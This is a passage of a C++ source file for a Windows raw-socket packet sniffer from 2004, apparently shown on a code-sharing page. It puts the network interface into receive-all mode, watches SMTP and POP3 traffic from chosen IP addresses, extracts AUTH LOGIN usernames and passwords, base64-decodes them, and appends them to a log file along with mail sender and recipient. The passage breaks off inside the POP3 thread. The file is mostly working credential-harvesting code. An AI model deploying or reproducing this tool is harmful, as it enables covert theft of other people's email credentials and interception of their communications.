📄 sniffer.cpp
字号:
////////////////////////////////////////////////////////////////////////////////////
// Raw Sniffer Code V1.0 //
// powered by shadow @2004/10/4 //
// my web:http://www.codehome.6600.org //
////////////////////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include "SNIFFER.h"
#include "BASE641.h"
#pragma comment(lib,"wsock32.lib")
//
typedef struct _USERINFO{ //参数信息结构体
CString ProtoType;
CString sourceip;
CString sourceport;
CString destip;
CString destport;
int SelfSnifferStartFlag;
int SnifferStartFlag;
int Way; //嗅探方式,1[单向嗅探],0[双向嗅探]
char SnifferDataPath[MAX_PATH]; //smtp和pop嗅探路径
char SelfSnifferDataPath[MAX_PATH];//自定义嗅探路径
int MaxData; //最大记录,单位M
}USERINFO,LPUSERINFO;
//
USERINFO userinfo;
SOCKET RawSocket;
FILE *fsniffer;
int BasePort;
CString SmtpListenIpList[MAX_SUBTHREAD_NUM]; //监听列表
CString PopListenIpList[MAX_SUBTHREAD_NUM];
CString ListenSmtpIp; //临时监听ip
CString ListenPopIp;
CString PopServerIp; //pop服务器ip
int SubThreadIdList[MAX_SUBTHREAD_NUM*2]; //子线程id列表
//获得协议类型
char * GetProtocol(unsigned char proto){
switch(proto){
case IPPROTO_TCP:return IPPROTO_TCP_TXT;break;
case IPPROTO_UDP:return IPPROTO_UDP_TXT;break;
case IPPROTO_ICMP:return IPPROTO_ICMP_TXT;break;
case IPPROTO_IGMP:return IPPROTO_IGMP_TXT;break;
default:return IPPROTO_DEFAULT_TXT;break;
}
}
//check ip if is listened
bool SmtpIpIsListened(CString ip){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(SmtpListenIpList[i].Compare(ip)==0) return true;
}
return false;
}
bool PopIpIsListened(CString ip){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(PopListenIpList[i].Compare(ip)==0) return true;
}
return false;
}
bool InsertSmtpListenIpList(CString ip){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(SmtpListenIpList[i]==""){
SmtpListenIpList[i]=ip;
return true;
}
}
return false;
}
bool InsertPopListenIpList(CString ip){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(PopListenIpList[i]==""){
PopListenIpList[i]=ip;
return true;
}
}
return false;
}
bool DeleteSmtpListenIp(CString ip){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(SmtpListenIpList[i].Compare(ip)==0){
SmtpListenIpList[i]="";
return true;
}
}
return false;
}
bool DeletePopListenIp(CString ip){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(PopListenIpList[i].Compare(ip)==0){
PopListenIpList[i]="";
return true;
}
}
return false;
}
bool InsertSubThreadIdList(int threadid){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(SubThreadIdList[i]==0){
SubThreadIdList[i]=threadid;
return true;
}
}
return false;
}
bool DeleteSubThreadId(int threadid){
int i;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(SubThreadIdList[i]==threadid){
SubThreadIdList[i]=0;
return true;
}
}
return false;
}
int MessageSubThread(unsigned int msg){ //线程消息通知
int i,errorcode;
errorcode=0;
for(i=0;i<MAX_SUBTHREAD_NUM;i++){
if(SubThreadIdList[i]!=0){
try{
PostThreadMessage(SubThreadIdList[i],msg,NULL,NULL);
}
catch(...){
errorcode=14;
}
}
}
return errorcode;
}
//
CString GetSnifferData(SOCKET listensocket,CString listenip,CString ToPort){
char buffer[65535];
int readnum,totalbytes,datalen,HeaderLen;
IP_HEADER *IpHeader;
TCP_HEADER *TcpHeader;
UDP_HEADER *UdpHeader;
ICMP_HEADER *IcmpHeader;
CString FromIp,DestIp,FromPort,DestPort,Protocol,PacketData,DataLen;
char fromip[20],destip[20];
char *pdata;
//sniffer deail code
ZeroMemory(buffer,65535);
ZeroMemory(fromip,20);
ZeroMemory(destip,20);
datalen=0;
readnum=recv(listensocket,buffer,65535,0);
if(readnum==SOCKET_ERROR){
PacketData="no data";
return PacketData;
}
IpHeader=(IP_HEADER *)buffer;
Protocol.Format("%s",GetProtocol((unsigned char)IpHeader->Protocol));
sprintf(fromip,"%d.%d.%d.%d",IpHeader->FromIP.address[0],IpHeader->FromIP.address[1],IpHeader->FromIP.address[2],IpHeader->FromIP.address[3]);
sprintf(destip,"%d.%d.%d.%d",IpHeader->ToIP.address[0],IpHeader->ToIP.address[1],IpHeader->ToIP.address[2],IpHeader->ToIP.address[3]);
FromIp.Format("%s",fromip);
DestIp.Format("%s",destip);
totalbytes=ntohs(IpHeader->TotalLen);
HeaderLen=(IpHeader->VersionHdl&0x0f)*4;
totalbytes-=HeaderLen;
switch(IpHeader->Protocol){
case IPPROTO_ICMP:
IcmpHeader=(ICMP_HEADER *)(buffer+HeaderLen);
datalen=totalbytes-ICMP_HEADER_LEN;
FromPort.Format("-");
DestPort.Format("-");
pdata=(char *)IcmpHeader+ICMP_HEADER_LEN;
PacketData.Format("type:%d code:%d data:%s",IcmpHeader->Type,IcmpHeader->Code,pdata);
break;
case IPPROTO_UDP:
UdpHeader=(UDP_HEADER *)(buffer+HeaderLen);
datalen=totalbytes-UDP_HEADER_LEN;
FromPort.Format("%d",ntohs(UdpHeader->FromPort));
DestPort.Format("%d",ntohs(UdpHeader->ToPort));
pdata=(char *)UdpHeader+UDP_HEADER_LEN;
PacketData.Format("%s",pdata);
break;
case IPPROTO_TCP:
TcpHeader=(TCP_HEADER *)(buffer+HeaderLen);
HeaderLen=((TcpHeader->HeaderLen)>>4)*4;
FromPort.Format("%d",ntohs(TcpHeader->FromPort));
DestPort.Format("%d",ntohs(TcpHeader->ToPort));
pdata=(char *)TcpHeader+HeaderLen;
PacketData.Format("%s",pdata);
datalen=totalbytes-HeaderLen;
break;
default:
FromPort.Format("-");
DestPort.Format("-");
datalen=totalbytes;
PacketData.Format("no data");
break;
}
DataLen.Format("%d",datalen);
// PacketData="no data";
if(FromIp.Compare(listenip)==0&&DestPort.Compare(ToPort)==0) return PacketData;
else PacketData="no data";
return PacketData;
}
//write smtp sniffer
void WriteSMTPSniffer(char *filename,CString username,CString password,CString mailfrom,CString mailto){
CString SnifferTRHead="\r\n-----------------SMTP嗅探------------------\r\n";
FILE *fout;
fout=fopen(filename,"ab+");
if(fout!=NULL){
fputs(SnifferTRHead,fout);
fputs("用户名:"+username+"\r\n密码:"+password+"\r\n"+mailfrom+"\r\n"+mailto,fout);
fclose(fout);
}
else printf("File can not create...\r\n");
}
//write pop sniffer
void WritePOPSniffer(char *filename,CString username,CString password,CString pop){
CString SnifferTRHead="\r\n-----------------POP嗅探------------------\r\n";
FILE *fout;
fout=fopen(filename,"ab+");
if(fout!=NULL){
fputs(SnifferTRHead,fout);
fputs("用户名:"+username+"\r\n密码:"+password+"\r\nPOP IP:"+pop,fout);
fclose(fout);
}
else printf("File can not create...\r\n");
}
//SMTP登陆嗅探线程
UINT SmtpSnifferThread(LPVOID param){
//
MSG msg;
int ErrorCode;
CString SnifferStr;
CString ListenIp,toport;
bool SMTPSTART;
bool SMTPAUTHLOGIN;
int SMTP_LOGIN_STEP;
bool SMTPDATASTART;
bool GetMailOK;
CString MailFrom,MailTo,UserName,PassWord,MailData,AllString;
SMTPSTART=true;
SMTPAUTHLOGIN=false;
SMTPDATASTART=false;
GetMailOK=false;
MailFrom="no get mailfrom";
MailTo="no get mailto";
UserName="no get username";
PassWord="no get password";
MailData="no get maildata";
int this_threadid=GetCurrentThreadId();
InsertSubThreadIdList(this_threadid);
ListenIp=ListenSmtpIp;
toport="25";
//set rawsock to listen
SOCKET SmtpSocket;
SmtpSocket=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(SmtpSocket==INVALID_SOCKET){
ErrorCode=4;
DeleteSmtpListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
int rcvtimeout=5000;
if(setsockopt(SmtpSocket,SOL_SOCKET,SO_RCVTIMEO,(const char *)&rcvtimeout,sizeof(rcvtimeout))==SOCKET_ERROR){
ErrorCode=5;
DeleteSmtpListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
char hostname[100];
char *hostip;
hostent *myhost;
sockaddr_in localsock;
gethostname(hostname,100);
myhost=gethostbyname(hostname);
hostip=inet_ntoa(*(in_addr *)myhost->h_addr_list[0]);
localsock.sin_family=AF_INET;
localsock.sin_port=htons(++BasePort);
localsock.sin_addr.S_un.S_addr=inet_addr(hostip);
if(bind(SmtpSocket,(const sockaddr *)&localsock,sizeof(localsock))==SOCKET_ERROR){
ErrorCode=7;
DeleteSmtpListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
DWORD dwValue=1;
if(ioctlsocket(SmtpSocket,SIO_RCVALL,&dwValue)==SOCKET_ERROR){
ErrorCode=8;
DeleteSmtpListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
//
printf("\r\n"+ListenIp+":sub thread smtp sniffer start!try to sniffer data...\r\n");
while(true){
if(PeekMessage(&msg,NULL,WM_SNIFFER_CLOSE,WM_SNIFFER_CLOSE,PM_REMOVE)){
closesocket(SmtpSocket);
TRACE("subthread close ok!");
break;
}
SnifferStr=GetSnifferData(SmtpSocket,ListenIp,toport);
if(SnifferStr.Compare("no data")==0){
Sleep(2);
continue;
}
int index;
CString LowSnifferStr;
LowSnifferStr=SnifferStr;
LowSnifferStr.MakeLower();
if(SMTPSTART){
if(index=LowSnifferStr.Find("mail from:",0)==0){
if(index=SnifferStr.Find("\r\n",0)){
if(MailFrom=="no get mailfrom") MailFrom=SnifferStr.Mid(0,index);
}
}
else if(index=LowSnifferStr.Find("rcpt to:",0)==0){
if(index=SnifferStr.Find("\r\n",0)){
if(MailTo=="no get mailto") MailTo=SnifferStr.Mid(0,index);
}
SMTPSTART=false;
TRACE("get last data!\r\n");
GetMailOK=true;
break;
}
else if(SMTPAUTHLOGIN){
if(SMTP_LOGIN_STEP==1){
if(index=SnifferStr.Find("\r\n",0)){
if(UserName=="no get username") UserName=SnifferStr.Mid(0,index);
}
SMTP_LOGIN_STEP=2;
continue;
}
if(SMTP_LOGIN_STEP==2){
if(index=SnifferStr.Find("\r\n",0)){
if(PassWord=="no get password") PassWord=SnifferStr.Mid(0,index);
}
SMTPAUTHLOGIN=false;
}
}
/*
if(index=LowSnifferStr.Find("data",0)==0){
SMTPDATASTART=true;
TRACE("listen data ok!\r\n");
continue;
}
*/
else if(index=LowSnifferStr.Find("auth login",0)==0){
SMTPAUTHLOGIN=true;
SMTP_LOGIN_STEP=1;
}
/*
if(SMTPDATASTART){
if(index=SnifferStr.Find("\r\n.\r\n",0)){
MailData+=SnifferStr.Mid(0,index);
SMTPDATASTART=false;
TRACE(MailData+"get mail data ok!\r\n");
continue;
}
else{
MailData+=SnifferStr;
continue;
}
}
*/
else if(index=LowSnifferStr.Find("quit",0)==0){
SMTPSTART=false;
TRACE("get last data!\r\n");
GetMailOK=true;
break;
}
}
Sleep(1);
}
if(GetMailOK&&UserName!="no get username"&&PassWord!="no get password"){
BASE64 base64;
char enusername[50];
char enpassword[50];
ZeroMemory(enusername,0,50);
ZeroMemory(enpassword,0,50);
if(UserName!="no get username"&&UserName.GetLength()<50){
sprintf(enusername,"%s",UserName);
UserName.Format("%s",base64.StringDecode((unsigned char *)enusername));
}
if(PassWord!="no get password"&&PassWord.GetLength()<50){
sprintf(enpassword,"%s",PassWord);
PassWord.Format("%s",base64.StringDecode((unsigned char *)enpassword));
}
AllString=UserName+"\r\n"+PassWord+"\r\n"+MailFrom+"\r\n"+MailTo;
printf("This is listen:\r\n"+AllString);
WriteSMTPSniffer(userinfo.SnifferDataPath,UserName,PassWord,MailFrom,MailTo);
}
closesocket(SmtpSocket);
Sleep(1000);
DeleteSmtpListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
TRACE("\r\nsub thread exit!");
return 0;
}
//POP3登陆嗅探线程
UINT PopSnifferThread(LPVOID param){
MSG msg;
int ErrorCode;
CString SnifferStr;
CString ListenIp,PopIp,toport;
bool POPSTART;
bool GetMailOK;
CString UserName,PassWord,AllString;
ListenIp=ListenPopIp;
PopIp=PopServerIp;
POPSTART=true;
GetMailOK=false;
UserName="no get username";
PassWord="no get password";
int this_threadid=GetCurrentThreadId();
InsertSubThreadIdList(this_threadid);
toport="110";
//set rawsock to listen
SOCKET POPSocket;
POPSocket=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(POPSocket==INVALID_SOCKET){
ErrorCode=4;
DeletePopListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
int rcvtimeout=5000;
if(setsockopt(POPSocket,SOL_SOCKET,SO_RCVTIMEO,(const char *)&rcvtimeout,sizeof(rcvtimeout))==SOCKET_ERROR){
ErrorCode=5;
DeletePopListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
return ErrorCode;
}
char hostname[100];
char *hostip;
hostent *myhost;
sockaddr_in localsock;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -